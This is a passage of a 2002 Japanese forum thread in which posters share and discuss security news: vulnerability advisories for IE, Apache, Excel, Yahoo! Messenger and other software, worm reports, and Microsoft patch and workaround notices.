もの。同氏のサイトによると、この問題は、ユーザーがExcelファイル(拡張子は.xls)
を開く時、XMLスタイルシートを見る選択をした場合に関係する。万が一XML
スタイルシートに悪質なコードが含まれている場合、Excelは警告なしに
このコードを実行してしまう。同氏はExcelでXMLスタイルシートを利用しないよう
呼びかけている。
ただし、Excelは、デフォルトではスタイルシートを含む票を表示しない設定に
なっている。
(以上、2002年5月28日のZDNet JAPANより一部引用―全文は引用元を参照)
引用元:
http://www.zdnet.co.jp/news/0205/28/nebt_01.html N+スレ(記者坊氏):
【IT】Excelにセキュリティホール?
http://news.2ch.net/test/read.cgi/newsplus/1022572881/
164 :
むむむ ◆MUMUMU4w :02/05/29 02:21 ID:1DSrtbip
■Windows UpdateでWindows XPがフリーズ
brake-handle曰く、"Show's Hot CornerのMS Watch(05/28付)によると、Windowsに
パッチを当てて直すはずのWindows Updateで逆にWindowsがフリーズすることが
ある模様。現時点でこの問題に対する対策を調査、公開したのはNECのみとなって
いる。
(以上、2002年5月29日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=02/05/28/0559257
165 :
むむむ ◆MUMUMU4w :02/05/30 11:11 ID:vakZ80CW
168 :
むむむ ◆MUMUMU4w :02/05/31 03:11 ID:6QJMXHtx
169 :
むむむ ◆MUMUMU4w :02/05/31 14:42 ID:kGBHcKp6
■MS、イントラネット用にWindows Updateサーバを構築できるパッケージを無償公開へ
マイクロソフトは,Windowsにオンラインでパッチを適用できるWindows Update
サイトを社内に構築するソフト「Microsoft Software Update Services」(SUS)を
来週にもWeb上で無償公開する。このソフトを使うと,インターネットとのトラフィック
が削減できるだけでなく,社内のWindowsマシンに適用すべきパッチを管理者が
コントロールすることができる。
SUSは,このWindows Updateサイトを社内に自由に設置できるようにするソフト。
「SUSサーバ」というコンポーネントをインストールしたマシンが定期的にMicrosoftの
Windows Updateサイトをチェックして,新しいパッチを発見すると自動的にダウン
ロードしてくる。それらのパッチの中から管理者が指定したものだけが実際に社内に
公開される。これにより,各マシンがインターネット経由でダウンロードする必要がなく
なるだけでなく,社内で適用すべきパッチを管理者がコントロールできるようになる。
さらに,SUSを使うと管理者権限を持っていないユーザーが利用しているマシンに
対してもパッチを適用できるというメリットがある。
(以上、2002年5月31日のBizTech Newsより一部引用―全文は引用元を参照)
引用元:
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020530/3/
>169 いいねー、コレ。 こんなの待ってたよ。
171 :
170 :02/05/31 16:04 ID:???
何だよ、2000とXPだけしか対象じゃないじゃん。 ちっ、使えねーな、コレ。
172 :
age :02/05/31 21:02 ID:D8C6pvVr
173 :
:02/05/31 21:31 ID:???
>>169 またまた例によって中途半端なことしてくれたもんだなぁ(w
パッチ全てをミラーしてくれると便利だったのに。
174 :
名無しさん@お腹いっぱい。 :02/06/03 08:41 ID:VB5tYhQy
保守age
175 :
むむむ ◆MUMUMU4w :02/06/03 13:22 ID:4MPCm+8M
若干旧聞です。CERTが出たのを見落としてました。スマソ。
■Macromedia JRun 3.0/3.1 に任意のコードを実行できるセキュリティホール
米Macromediaや米CERT/CCは米国時間5月29日,アプリケーション・サーバーで
あるMacromedia JRun 3.0および3.1のWindows版にセキュリティ・ホールがあることを
明らかにした。
JRunが動作するWebサーバーに,細工が施されたリクエストを送信されると,Local
System権限で任意のコードを実行される恐れがある。ただし,Internet Information
Server/Services(IIS)とともに動作させている場合のみ影響を受ける。対策は,パッチ
の適用かJRun 4へのアップグレード。
(以上、2002年6月3日のBizTech Newsより一部引用―全文は引用元を参照)
引用元:
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020531/1/
176 :
むむむ ◆MUMUMU4w :02/06/03 23:52 ID:wvN1lTSY
177 :
むむむ ◆MUMUMU4w :02/06/05 00:49 ID:0gvliiJ9
■トレンドマイクロ、Outlookを介して感染活動を行なう新種ウイルスを報告
トレンドマイクロは、新種ウイルス「WORM_ENEMANY(エネマニー)」の発見を
報告した。危険度は「低」だが、Microsoft Outlookを介して感染活動を行なうため、
注意が必要だという。
今回発見されたウイルスは、「WORM_ENEMANY.A」「WORM_ENEMANY.B」
「WORM_ENEMANY.C」の3種類。共通した特性としては、単体で動作するプログラム
のため、他ファイルへの感染活動を行なわない、添付ファイルを実行しない限り活動
を行なわない、感染した場合にMAPI機能を利用し、Microsoft Outlookのアドレス帳の
宛先全員に自身を添付してメールを送信するといった点があげられる。なお、Outlook
Expressではアドレス帳に登録したアドレスにメール送信を行なうことはないという。
(以上、2002年6月5日のBroadband Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/broadband/news/2002/06/04/enemany.htm
178 :
むむむ ◆MUMUMU4w :02/06/05 00:55 ID:0gvliiJ9
毎度ご苦労様 > むむむ ◆MUMUMU4w
180 :
名無しさん@お腹いっぱい。 :02/06/05 03:16 ID:1P3tHkOU
なんかうざいんですが、コレってクッキー仕込まれたのかな。 規則「インバウンド TCP アドレス: adg001.naturalidentity.com」が ***.***.***.***,auth(113) を遮断しました。 詳細: インバウンド TCP 接続 ローカルアドレス、 サービスは ***.***.***.***,auth(113) リモートアドレス、 サービスは adg001.naturalidentity.com(211.13.215.79), 2717 プロセス名は N/A
181 :
むむむ ◆MUMUMU4w :02/06/05 11:14 ID:IYu2K/XU
>>179 どうも。
>>176 の記事が /.J にもあったので以下に掲載。
Opera もデフォルトのままではまずい模様。
■IEとOperaでプレーンテキスト出力にもXSS脆弱性
k3c 曰く、 "セキュリティmemoメーリングリストへの投稿で指摘されたところによれば、
Content-Type:text/plainなデータをInternet Explorer(IE)に表示させたとき、テキスト
中にHTMLタグが入っていればContent-Typeを無視してHTMLとして解釈してしまう
ことがあり、結果として、外部からの入力結果をそのままContent-Type:text/plainな
データの一部として返すようなCGIではクロスサイトスクリプティング(XSS)脆弱性を
発現させてしまう可能性がある。この問題はIEがContent-Typeを無視することが
問題の根本なのだが、過去にもたびたび 指摘されて来たにもかかわらずマイクロ
ソフトはこの問題点を放置しており、今後も修正は望み薄。サーバ側での対策が
望ましい。
(中略)
なお、直後の投稿では、Operaでも出荷時の設定では同様の動作をすることが指摘
されている。
(以上、2002年6月5日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=02/06/03/0532205
operaは設定でファイルタイプを「MINE〜」にしておけって 事みたいね。とりあえずは。
183 :
むむむ ◆MUMUMU4w :02/06/05 23:22 ID:0gvliiJ9
■Internet Explorer5.5以上のGopherコードにセキュリティーホール
フィンランドのOnline Solutions社は4日、WWWブラウザー「Internet Explorer(IE)」に
含まれているGopherクライアント機能にセキュリティーホールが存在することを発見
したと発表した。このセキュリティーホールの悪用により、システムを自由に操られる
可能性があるため、Gopherの機能を無効にするなどの措置が必要だとしている。
この攻撃はWebページにGopherサーバーへのリンクを張ったり、HTMLメールを
利用して仕掛けられる。バッファーオーバーフローによって攻撃コードを仕掛ける
には完全なGopherサーバーでなくともごく簡単な仕組みで十分だという。
Online Solutionsは、この件について5月20日にMicrosoftに報告、Microsoftは現在
修復に向けて作業を進めている。Online Solutionsではそのパッチが配布されるまで
の間、Gopherプロトコルを無効にすることを利用者に勧めている。
(以上、2002年6月5日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/0605/gopher.htm 原文:
http://www.solutions.fi/index.cgi/news_2002_06_04?lang=eng Gopherか、、、。久々に聞いたす。
184 :
むむむ ◆MUMUMU4w :02/06/07 11:26 ID:VagbyzoX
■MS02-026: Microsoft .NET Frameworkのセキュリティホール(IISと併用する場合)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-026ov.asp MS02-026 に関する情報
「MS02-026 : ASP.NET ワーカー プロセスに未チェックのバッファが含まれる
(Q322289)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによってお客様のコンピュータ上で任意のプログラムが
実行される、または、サービス拒否攻撃が行われる可能性があります。
対象となる製品
==============
・ Microsoft .NET Framework version 1.0
.NET Framework がインストールされているかを確認するには、
「コントロールパネル」 から 「プログラムの追加と削除」 をクリックし、
現在インストールされているプログラムの欄に
「Microsoft .NET Framework」 が表示されているかを確認してください。
本問題の影響を受けるのは Internet Information Services 5.0 以上を
使用し、ASP.NET アプリケーションを利用している環境です。そのため、
次に記載する OS に .NET Framework をインストールしている環境では、
修正プログラムを適用する必要はありません。
・ Windows 98、Windows 98 Second Edition、および、Windows Millennium Edition
・ Windows NT 4.0
・ Windows XP Home Edition
修正プログラム
==============
・ Microsoft .NET Framework version 1.0
http://download.microsoft.com/download/NETFrameworkRedistributable/Patch/1/NT45XP/JA/NDP10_QFEM_Q322298_Ja.exe ダウンロードされる修正プログラムのファイル名は次のとおりです。
NDP10_QFEM_Q322298_Ja.exe
ファイル名の Q 以降の数字が、本セキュリティ情報のタイトルにある
サポート技術情報の文章番号 Q322289 と異なりますので、ご注意ください。
注意 この修正プログラムをインストールするには
.NET Framework Service Pack 1 が必要です。
.NET Framework Service Pack 1 は次のサイトからダウンロードできます。
・ Microsoft .NET Framework Service Pack 1
http://www.microsoft.com/japan/msdn/netframework/downloads/sp1/
185 :
むむむ ◆MUMUMU4w :02/06/07 11:46 ID:VagbyzoX
186 :
むむむ ◆MUMUMU4w :02/06/07 11:47 ID:VagbyzoX
>>185 + Workaround:
~~~~~~~~~~~~~~~~~
IEの詳細設定にあるオプション「FTPサイト用のフォルダ ビューを使用する」のチェックを
外してください。もしくは、フォルダ オプションで「従来のWindowsファルダを使う」を
選択することで回避できます。
187 :
むむむ ◆MUMUMU4w :02/06/07 11:56 ID:VagbyzoX
■Yahoo! Messengerに複数の脆弱性、最新版へのバージョンアップが必要 CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger Original release date: June 05, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Yahoo! Messenger version 5,0,0,1064 and prior for Microsoft Windows Overview There are multiple vulnerabilities in Yahoo! Messenger. Attackers that are able to exploit these vulnerabilities may be able to execute arbitrary code with the privileges of the victim user. We have not seen active scanning for these vulnerabilities, nor have we received any reports of these vulnerabilities being exploited, but users should upgrade to version 5,0,0,1065 or later. (中略) III. Solution Upgrade to the latest version of Yahoo! Messenger On May 22, 2002, Yahoo! released a fixed version of Yahoo! Messenger (5,0,0,1065) and began issuing a patch (5,0,0,1066) via the AutoUpdater to address this issue. All users should upgrade to version 5,0,0,1065 or later. Users with versions prior to 5,0,0,1066 that have "Auto Update" enabled will receive a message informing them that an upgrade is available. All users should accept this upgrade. Users who downloaded Yahoo! Messenger after May 22, 2002, should be aware that a bug in the distribution server may have inadvertantly installed Yahoo! Messenger version 5,0,0,1036, which is vulnerable to all issues in this advisory. The bug in the distribution server has since been resolved. Users should upgrade and verify the version of Yahoo! Messenger by selecting the "About Yahoo! Messenger..." option from the Help menu.
188 :
むむむ ◆MUMUMU4w :02/06/07 15:53 ID:VagbyzoX
>>187 日本語ソース:
■『Yahoo! Messenger』に依然セキュリティホール
Yahoo! (NASDAQ:YHOO) が、インスタントメッセージ (IM) サービス『Yahoo! Messenger』に
存在するセキュリティホール修正プログラム (パッチ) を配布したのは、ほんの2週間ほど
前のこと。だが、まだセキュリティ脅威が残っていることが判明し、Yahoo! のフォローアップ
が続いている。
Yahoo! は5月22日、セキュリティホールを修正した Yahoo! Messenger のバージョン
「5,0,0,1065」、およびパッチ「5,0,0,1066」を、自動更新通知機能『AutoUpdater』を介して
配布し始めた。
しかし、コンピュータ緊急対応センター (CERT/CC) は5日、勧告を発表。配信サーバー
内のバグのため、2002年5月22日以降に Yahoo! Messenger をダウンロードした場合、
リモート攻撃に対して脆弱な古いバージョン「5,0,0,1036」がインストールされた可能性が
ある、として警告した。現在そのバグは修正されている。
(以上、2002年6月7日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020607/12.html
189 :
NT4.0 :02/06/07 17:01 ID:jPXTdEPV
Q319733 IISの10個のセキュリティ−ホールふさぐパッチ、当てたら調子悪くなんない? IIS落ちまくりなんだけど。
190 :
NT4 :02/06/07 17:03 ID:jPXTdEPV
Q319733 IISの10個のセキュリティーホールつぶすパッチ、当てたら調子悪くなんない? IIS落ちまくりなんだけど。 されって、アンインストールしたらまずいですよね。・・・
191 :
むむむ ◆MUMUMU4w :02/06/07 17:13 ID:VagbyzoX
>>187 >>188 日本語版のYahoo! Messengerは該当機能がないため、影響を受けない模様。
■Yahoo!メッセンジャーにセキュリティ・ホール,ただし日本語版は影響を受けない
米CERT/CCは米国時間6月5日,インスタント・メッセージング・ソフト「Yahoo!メッセン
ジャー(Yahoo! Messenger)」に見つかった複数のセキュリティ・ホールを警告した。
セキュリティ・ホールを悪用されると,ユーザー・マシン上で任意のコードを実行される
恐れがある。影響を受けるのは,Windows版のバージョン 5,0,0,1064 以前。ただし,
ヤフーが公開している日本語版は影響を受けない。
(中略)
ただし,日本語版ユーザーは影響を受けない。ヤフーが現在公開している正式版の
バージョンは 3,5,0,850e。同社によれば,このバージョンには今回セキュリティ・ホールが
見つかった機能がないために影響を受けないという。同様に,過去に公開された3,5,0,850
以前も影響を受けない。
また,ベータ版として現在公開されているバージョンは5,0,0,1090a であり,セキュリティ・
ホールは修正済みである。つまり,ヤフーから公開されている日本語版のYahoo!メッセン
ジャーについては,正式版およびベータ版のいずれも,今回のセキュリティ・ホールの
影響を受けることはない。
(以上、2002年6月7日のIT Proニュースより一部引用―全文は引用元を参照)
192 :
むむむ ◆MUMUMU4w :02/06/07 19:40 ID:VagbyzoX
■Flash を用いたクロスサイトスクリプティング攻撃の手法が公表、実際のデモつき
eyeonsecurity は、Flash を用いてクロスサイトスクリプティング攻撃を行う手法を
公表した。
Bypassing JavaScript Filters ? the Flash! Attack
http://eyeonsecurity.net/papers/flash-xss.htm この攻撃方法を用いることで、多くの WEB サイトで行われているjavaスクリプトの
フィルタリングをすりぬけることが可能である。
複数の利用者に対して、Flash の 掲載を許している WEB サイトがたくさん存在する。
レポートには、DeviantART 、MSN Communities あるいは Flash の投稿を許している
BBS などがこの攻撃を受ける可能性があると指摘している。
これらの WEB サイトでは、同じドメイン上で複数の利用者が Flash をアップロード、
投稿することを許している。そのため、Flash によるクロスサイトスクリプティング攻撃
により、セッションハイジャックなどが可能になる。
こうした WEB サイトでは、HTMLタグや Active スクリプトをフィルタリングする措置を
講じているが、Flash に含まれている java スクリプトはフィルタリングすることができない。
そのため、悪意をもった java スクリプトを含んだ Flash をアップロードし、他の利用者
がその Flash を見た時に Cookie を盗むなどのクロスサイトスクリプティング攻撃を行う
ことができる。
レポートでは、最後に対策として「Flash をアップロードさせないこと」としている。
eyeonsecurity 社の Web には、攻撃のデモページもある。
*なお、このデモは実際に動作するので、見る際には注意が必要である。
(以上、2002年6月7日のNetSecurityより一部引用―全文は引用元を参照)
引用元:
https://www.netsecurity.ne.jp/article/1/5464.html 引用元に実際の「デモ」へのリンクあり。
193 :
むむむ ◆MUMUMU4w :02/06/07 19:43 ID:VagbyzoX
194 :
むむむ ◆MUMUMU4w :02/06/10 19:12 ID:xD8e8/9e
>>194 記事の中の抜き出しなんだけど、
「ユーザーは最新のアンチウイルス・ソフトを利用するべきだ。
また、勝手に送られてくる電子メールは疑ってみた方がいい」
結局これだけなんだよね。重要なのって。
なんか、5年前から同じこと言ってるだけの気がするが。
196 :
むむむ ◆MUMUMU4w :02/06/12 11:45 ID:5bofYKDc
>>183 の公式アナウンスがMSから出ました。
現時点ではパッチは準備中で、設定で回避しろということの模様。
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーがお客様のコンピュータ上で任意のプログラムを
実行することが出来ます。
対象となる製品
==============
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 5.01
・ Microsoft Internet Security and Acceleration (ISA) Server 2000
・ Microsoft Proxy Server 2.0
修正プログラム
==============
以下の製品の問題を修正するプログラムは現在準備中です。
公開され次第、このページでご案内します。
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 5.01
・ Microsoft ISA Server 2000
・ Microsoft Proxy Server 2.0
回避策
======
Internet Explorer
-----------------
1. Internet Explorer を開きます
2. メニューの [ツール] - [インターネット オプション] を開きます
3. [接続] タブを選択します
4. [LANの設定] ボタンをクリックします
・ [設定を自動的に検出する] のチェックをオフにします
・ もし、[自動構成スクリプトを使用する] のチェックが
オンになっており、 Gopher を利用している場合は、
管理者に確認してください。
5. [LAN にプロキシ サーバーを使用する] のチェックをオンにします
6. [詳細設定] ボタンをクリックします
7. [すべてのプロトコルに同じプロキシ サーバーを使用する] のチェックを
オフにします。
・ [Gopher]の右側のテキストボックスに Localhost を入力します
・ [Gopher]と同じ行の右端のテキストボックスに 1 を入力します
8. それぞれのウィンドウで [OK] ボタンをクリックし、
[インターネット オプション] を閉じます
197 :
むむむ ◆MUMUMU4w :02/06/12 16:43 ID:5bofYKDc
■有名人からのメールを騙るワームが出現、注意呼びかけ
--- 以下引用
ウイルス対策企業の Sophos はコンピュータユーザーに対し、新たに見つかったばかり
だが山火事のごとく猛威をふるっている『Shakira Pics』Eメールワーム (VBS/VBSWG-AQ)
への警戒を呼び掛けている。
ポップ歌手の Shakira は、ウイルス拡散のための題材として利用された有名人としては
もっとも新しい。これまでに、Anna Kournikova、Jennifer Lopez、Britney Spearsなどの
有名人がその人気を利用されている。
芸能・スポーツ関係だけではない。Ronald Reagan 元大統領、Bill Clinton 元大統領、
George W. Bush 大統領はじめ、Margaret Thatcher 元英首相、PK Botha 元南アフリカ
大統領などといった政治的指導者、さらには『ポケモン』のピカチュウや『South Park』の
Kyle などの人気アニメキャラクターに至るまで、各界の有名人がウイルスの感染拡大
に利用されている。ウイルスの作者達はこうした題材は PC へのウイルス拡散に効果が
あると考えているのだ。
Bill Gates 氏の名もまた、ユーザーに感染ファイルを開かせるための心理的トリックと
して利用されたことがある。
Shakira ワームは「Shakira pics」という件名の Eメ−ルとして届く。メールには
「ShakiraPics.jpg.vbs」というファイルが添付されている。
(以上、2002年6月12日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020612/11.html
198 :
むむむ ◆MUMUMU4w :02/06/13 11:20 ID:AYnv15hR
199 :
むむむ ◆MUMUMU4w :02/06/13 11:22 ID:AYnv15hR
200 :
むむむ ◆MUMUMU4w :02/06/13 11:28 ID:AYnv15hR
201 :
むむむ ◆MUMUMU4w :02/06/13 11:47 ID:AYnv15hR
玄人志向の最新USB 2.0カードにウイルス混入が判明、回収・交換へ
玄人志向は13日(木)、先週発売したばかりのUSB 2.0カード「USB2.0V-PCI」の
デバイスドライバ収録CD-ROMにウイルスが混入していたことを明らかにし、その
対応策を同時に発表した。同製品を購入した人は、すぐに玄人志向が推奨する
駆除ツールを使って特定のウイルスを駆除することが必要だ。
「USB2.0V-PCI」は、VIA製USB 2.0コントローラーVT6202を搭載した初のUSB 2.0
カードとして先週登場したばかりの製品。約2,000円という低価格な点が受け、売れ
行きは順調のようだったが、ウイルス混入が判明した直後に在庫は自主回収され、
現在は店頭から姿を消している。玄人志向ではこの製品を廃番にするとしており、
少なくとも同じブランドでこの製品が再び出回ることはなさそうだ。
CD-ROMの中に混入していたのは「W32.ElKern.4926」というウイルスで、感染すると
\Windows\Systemフォルダ内の実行形式ファイルすべてに感染しようとするほか、
オープンな共有リソースやマッピングドライブ上のファイルに感染するという感染力の
非常に高いウイルス。同じファイルに繰り返し増殖することで、感染先のファイルを
修復不可能にする可能性があり、最悪の場合はOS自体がクラッシュしてしまう。
(以上、2002年6月13日のAKIBA PC Hotline!より一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/akiba/hotline/20020615/etc_usb20v.html 情報発見場所:
http://news.2ch.net/test/read.cgi/newsplus/1022446992/266
202 :
むむむ ◆MUMUMU4w :02/06/13 19:29 ID:AYnv15hR
203 :
むむむ ◆MUMUMU4w :02/06/13 19:33 ID:AYnv15hR
XPでアップデート出来ない人はACCSに自首して下さい。
Windows Update 自体が信用出来ない以上、何をすればいいのか途方に暮れる。
206 :
むむむ ◆MUMUMU4w :02/06/14 00:11 ID:P9PswPOo
207 :
むむむ ◆MUMUMU4w :02/06/14 13:48 ID:JGARLj3y
----------------------------------------------------------------------
SNS Advisory No.54
Active! mail Executing the Script upon the Opening of a Mail Message Vulnerability
Problem first discovered: Fri, 31 May 2002
Published: Wed, 13 June 2002
----------------------------------------------------------------------
概要:
-----
Active! mail には、特定の電子メールヘッダに HTML タグが記述されてい
る場合、これを適切に変換せずにそのまま表示してしまうという問題があり
ます。
詳細:
-----
Active! mail は、株式会社トランスウエア(
http://www.transware.co.jp/ )
が開発および販売している Web ベースのメールシステムのパッケージ製品
です。
Active! mail には、特定の電子メールヘッダに HTML タグが記述されてい
る場合、これを適切に変換せずにそのまま表示してしまうという問題があり
ます。このため、仮にユーザが受け取った電子メールのヘッダに、<script>
タグを含む悪意のあるスクリプトが埋め込まれていた場合、その電子メール
を表示すると同時にスクリプトが実行され、これにより利用者の Cookie の
情報が漏洩し、攻撃者にWebメールシステムを不正に使用されてしまう等の
被害を受ける恐れがあります。
問題を確認したバージョン:
-------------------------
Active! mail 1.422
Active! mail 2.0
対策:
-----
Active! mail ver.2.0.1.1 へアップデートすることでこの問題を解消する
ことができます。これは以下の URL より入手可能です。
http://www.transware.co.jp/active/download/am_download.html 尚、我々がこの問題を発見し開発元に問い合わせたところ、翌営業日には、
パッチを作成してユーザに配布する予定である旨の連絡を受けました。
発見者:
-------
山崎 圭吾 (LAC)
注意:
-----
このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、
あるがままの形で提供されます。この情報を適用し生起される結果のリスクは
利用者が負うものとし、株式会社ラックは一切の責任を負わないものとします。
再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/54.html
208 :
誰か・・・ :02/06/15 12:07 ID:I4ReR+4K
うちのPCがウィルスに感染してしまったようです・・ 変なメールが来たので削除しようと思って右クリックしたらいきなり ファイルのダウンロードって出てウィルスをダウンロードしてしまったらしいのです それからPCの調子が悪くなりフリーズしまくりのネット速度遅くなりまくりです・・・ 誰か解決方法を教えてください。
209 :
名無しさん@お腹いっぱい。 :02/06/15 12:15 ID:5kGhtnko
駆除すればいいじゃん
210 :
むむむ ◆MUMUMU4w :02/06/15 13:32 ID:yIA8Pbpg
>>208 ネタなんだろうが、マジレス。
トレンドマイクロのオンラインスキャンかけてみそ。
あと AD-Awareというソフトを走らせてみるとお前の知らないところで
情報垂れ流すスパイウェアが沢山見つかるぞ。
脆弱性ってなに?
>>214 「未チェックのバッファーがオーバーフロー」するのか?
>>216 結果として、薄い子供が生まれるわけだな。
218 :
JSサイト :02/06/16 06:32 ID:a1ca/87K
220 :
名無しさん@お腹いっぱい。 :02/06/16 14:24 ID:JIGqcx4i
今度また新しいOS出すんだって? もっとXPとか2000とかちゃんとしてからにしろよな!
221 :
212さん :02/06/16 14:24 ID:LRtqeiic
オンラインスキャンってどうやってかけるんですか?
224 :
むむむ ◆MUMUMU4w :02/06/17 11:08 ID:SaYG2PR2
旧聞ですが一応載せておきます。
■「ポスペ」にセキュリティー問題 対策ファイルを提供
So-netは14日、メールソフトの「ポストペット」にウイルスが侵入する可能性があると
して、安全性強化のプログラムをダウンロードするよう要請した。
同社によると、一般に普及しているウイルス検知ソフトでは対応できないため、同社
サイトからのダウンロードが必要という。アップデートした場合、送り付けられるウイルス
を除去しやすくなる。
アップデートが必要なポストペットは、2001(バージョン2.05以前)、キッズ(1.01以前)、
ビアボイス(2.05以前)、DX(1.2以前)、お試し版(2.05以前)の5種類で、いずれもウィン
ドウズ版。マッキントッシュ版、ウィンドウズCE版、携帯端末のポケットポストペット版は
必要ない。
(以上、2002年6月17日の毎日インタラクティブより一部引用―全文は引用元を参照)
引用元:
http://www.mainichi.co.jp/digital/network/archive/200206/14/3.html ポストペットのセキュリティ対策のお知らせ:
http://www.postpet.so-net.ne.jp/up206/
225 :
むむむ ◆MUMUMU4w :02/06/17 12:46 ID:SaYG2PR2
226 :
むむむ ◆MUMUMU4w :02/06/17 23:55 ID:ycJKzBVQ
>>むむむ ◆MUMUMU4w 毎度の事ながら乙カレー。 会社でNT系の保守員やってるんで参考にしてるよー。
228 :
むむむ ◆MUMUMU4w :02/06/18 11:34 ID:cOBb1vev
■すべてのApache 1.x に脆弱性、Windows版も影響ありの模様
Internet Security Systems Security Advisory
June 17, 2002
Remote Compromise Vulnerability in Apache HTTP Server
Synopsis:
ISS X-Force has discovered a serious vulnerability in the default
version of Apache HTTP Server. Apache is the most popular Web server and
is used on over half of all Web servers on the Internet. It may be
possible for remote attackers to exploit this vulnerability to
compromise Apache Web servers. Successful exploitation may lead to
modified Web content, denial of service, or further compromise.
Affected Versions:
Apache 1.x
Note: Many commercial Web Application Servers such as Oracle 9ias and
IBM Websphere use Apache HTTP Server to process HTTP requests.
Additional products that bundle Apache HTTP Server for Windows may be
affected.
(以上、2002年6月18日のInternet Security Systems(ISS)より一部引用―全文は引用元を参照)
引用元:
http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20502
>>227 >>228 に書き忘れました。どうも。
私はあくまで公開情報をピックアップしてくるだけなので、取り扱いは各人にてお願いです。
231 :
むむむ ◆MUMUMU4w :02/06/18 14:09 ID:cOBb1vev
>>228 Apache の件の続報。
・CERT Advisoryも出ました。2.x もまずい模様(下記)。
(影響を受けるバージョン)
Web servers based on Apache code versions 1.3 through 1.3.24
Web servers based on Apache code versions 2.0 through 2.0.36
・さきほどのISS のパッチでは対応が不十分な模様。
--- 引用開始
The CERT/CC has been informed by the Apache Software Foundation that the
patch provided in the ISS advisory on this topic does not completely correct
this vulnerability.
--- 引用終了
・Windowsプラットホームではもろに影響を受ける模様。
--- 引用開始
II. Impact
For Apache versions 1.3 through 1.3.24 inclusive, this vulnerability may allow
the execution of arbitrary code by remote attackers. Several sources have reported
that this vulnerability can be used by intruders to execute arbitrary code on
Windows platforms. Additionally, the Apache Software Foundation has reported
that a similar attack may allow the execution of arbitrary code on 64-bit UNIX
systems.
--- 引用終了
引用元:
http://www.cert.org/advisories/CA-2002-17.html
232 :
むむむ ◆MUMUMU4w :02/06/18 14:20 ID:cOBb1vev
233 :
むむむ ◆MUMUMU4w :02/06/19 11:50 ID:jX8oWquX
■Apacheの対策版(1.3.26/2.0.39)がリリース The Apache Software Foundation and The Apache Server Project are pleased to announce the release of version 1.3.26 of the Apache HTTP Server. This Announcement notes the significant changes in 1.3.26. This version of Apache is principally a security and bug fix release. A summary of the bug fixes is given at the end of this document. Of particular note is that 1.3.26 addresses and fixes the issues noted in CAN-2002-0392 (mitre.org) [CERT VU#944335] regarding a vulnerability in the handling of chunked transfer encoding. We would like to thank Mark Litchfield of ngssoftware.com for discovering and reporting the vulnerability. --- Apache 2.0.39 Released --------------------------------------------- The Apache HTTP Server Project is proud to announce the third public release of Apache 2.0. Apache 2.0 has been running on the Apache.org website since December of 2000 and has proven to be very reliable.
234 :
:02/06/19 17:42 ID:???
>>192 じゃあflash見ない方がいいってことですか?
>>234 あくまで自己責任にて。ここの情報に限ったことではないですが。
236 :
むむむ ◆MUMUMU4w :02/06/19 22:54 ID:Cd5+M8FZ
■MSNチャットのセキュリティパッチがまた更新される
# ひでーな、、、。
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-022.asp ================================================================
今回の更新内容
このセキュリティ情報のページを更新し、2002 年 5 月 8 日 (米国日付) に
リリースされた修正が、影響を受ける過去のコントロールが再導入されることに
対して、システムを充分に保護しないことをお知らせしました。また、
アップデートされた修正が利用可能となったことをお知らせしました。
2002 年 5 月 8 日 (米国日付) にリリースされた修正のいずれかを適用している
お客様はアップデートされた修正を適用することを検討して下さい。
================================================================
MSN チャット コントロールの未チェックのバッファによりコードが実行される
(Q321661) (MS02-022)
登録日 : 2002/5/9
更新日 : 2002/6/19
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) MSN チャット
コントロールを使用しているすべてのお客様。(Microsoft(R) MSN チャット
コントロールは直接ダウンロードすることにより利用可能です。また、MSN
Messenger および Exchange Instant Messenger に同梱されています。)
脆弱性の影響 : 攻撃者の選択したコードが実行される
最大深刻度 : 高
推奨する対応策 : アップデートが最初にリリースされた時点で、これらを
インストールしていないお客様は、直ちにアップグレードされたアップデートを
インストールして下さい。最初のアップデートをインストールしたお客様は
アップグレードされたアップデートのインストールを検討して下さい。
影響を受けるソフトウェア :
・ Microsoft MSN チャット コントロール
・ MSN チャット コントロールを含む Microsoft MSN Messenger 4.5 および
4.6
・ MSN チャット コントロールを含む Microsoft Exchange Instant Messenger
4.5 および 4.6
問題 :
技術的な説明 :
2002 年 5 月 8 日 (米国日付)、マイクロソフトはこのセキュリティ情報の最初
のバージョンをリリースしました。2002 年 6 月 11 日 (米国日付)、この
セキュリティ情報を更新し、2002 年 5 月 8 日 (米国日付) にリリースした
